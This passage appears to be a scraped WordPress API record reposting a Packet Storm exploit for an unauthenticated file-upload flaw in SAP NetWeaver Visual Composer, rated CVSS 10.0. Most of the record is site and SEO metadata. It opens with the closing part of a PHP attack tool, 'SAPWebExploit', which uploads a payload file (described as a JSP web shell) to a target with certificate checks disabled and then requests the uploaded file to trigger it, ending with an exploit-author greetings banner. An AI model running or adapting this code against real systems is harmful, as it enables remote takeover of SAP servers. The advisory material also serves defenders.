curl_init();\\n $postData = [\\n $fieldName =\\u003e new CURLFile($payloadFile)\\n ];\\n \\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e $postData,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e 10\\n ]);\\n \\n $response = curl_exec($ch);\\n $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $error = curl_error($ch);\\n curl_close($ch);\\n \\n if ($error) {\\n return \\”\u062e\u0637\u0623: \\” . $error;\\n }\\n \\n return \\”HTTP $httpCode – \\” . substr($response, 0, 100);\\n }\\n \\n private function triggerPayload($baseUrl, $triggerPath) {\\n $url = $baseUrl . $triggerPath;\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e 10\\n ]);\\n \\n $response = curl_exec($ch);\\n $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n return \\”HTTP $httpCode – \\” . substr($response, 0, 50);\\n }\\n \\n private function displayResults($results) {\\n foreach ($results as $result) {\\n $class = ‘result’;\\n if (strpos($result, ‘\u062e\u0637\u0623’) !== false) {\\n $class .= ‘ error’;\\n } elseif (strpos($result, ‘\u0646\u062c\u0627\u062d’) !== false) {\\n $class .= ‘ success’;\\n } elseif (strpos($result, ‘\u062a\u062d\u0630\u064a\u0631’) !== false) {\\n $class .= ‘ warning’;\\n }\\n \\n echo \\”\\u003cdiv class=\\\\\\”$class\\\\\\”\\u003e$result\\u003c\/div\\u003e\\”;\\n }\\n }\\n }\\n \\n $app = new SAPWebExploit();\\n $app-\\u003ehandleRequest();\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215831″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215831\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-18T17:32:05″,”description”:”SAP NetWeaver Visual Composer contains an unauthenticated file upload vulnerability in the metadata uploader component that allows attackers to upload arbitrary files including JSP web…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-41396","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 SAP NetWeaver 7.20 Visual Composer Metadata Shell Upload_PACKETSTORM:215831 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41396\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 SAP NetWeaver 7.20 Visual Composer Metadata Shell Upload_PACKETSTORM:215831 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-18T17:32:05″,”description”:”SAP NetWeaver Visual Composer contains an unauthenticated file upload vulnerability in the metadata uploader component that allows attackers to upload arbitrary files including JSP web...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41396\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-18T11:48:36+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"18 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41396#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41396\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 SAP NetWeaver 7.20 Visual Composer Metadata Shell Upload_PACKETSTORM:215831\",\"datePublished\":\"2026-02-18T11:48:36+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41396\"},\"wordCount\":3548,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41396#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41396\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41396\",\"name\":\"\ud83d\udcc4 SAP NetWeaver 7.20 Visual Composer Metadata Shell Upload_PACKETSTORM:215831 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-18T11:48:36+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41396#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41396\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41396#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 SAP NetWeaver 7.20 Visual Composer Metadata Shell Upload_PACKETSTORM:215831\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 SAP NetWeaver 7.20 Visual Composer Metadata Shell Upload_PACKETSTORM:215831 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41396","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 SAP NetWeaver 7.20 Visual Composer Metadata Shell Upload_PACKETSTORM:215831 - zero redgem","og_description":"{“lastseen”:”2026-02-18T17:32:05″,”description”:”SAP NetWeaver Visual Composer contains an unauthenticated file upload vulnerability in the metadata uploader component that allows attackers to upload arbitrary files including JSP web...","og_url":"https:\/\/zero.redgem.net\/?p=41396","og_site_name":"zero redgem","article_published_time":"2026-02-18T11:48:36+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"18 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41396#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41396"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 SAP NetWeaver 7.20 Visual Composer Metadata Shell Upload_PACKETSTORM:215831","datePublished":"2026-02-18T11:48:36+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41396"},"wordCount":3548,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41396#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41396","url":"https:\/\/zero.redgem.net\/?p=41396","name":"\ud83d\udcc4 SAP NetWeaver 7.20 Visual Composer Metadata Shell Upload_PACKETSTORM:215831 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-18T11:48:36+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41396#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41396"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41396#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 SAP NetWeaver 7.20 Visual Composer Metadata Shell Upload_PACKETSTORM:215831"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41396","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41396"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41396\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41396"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41396"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41396"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}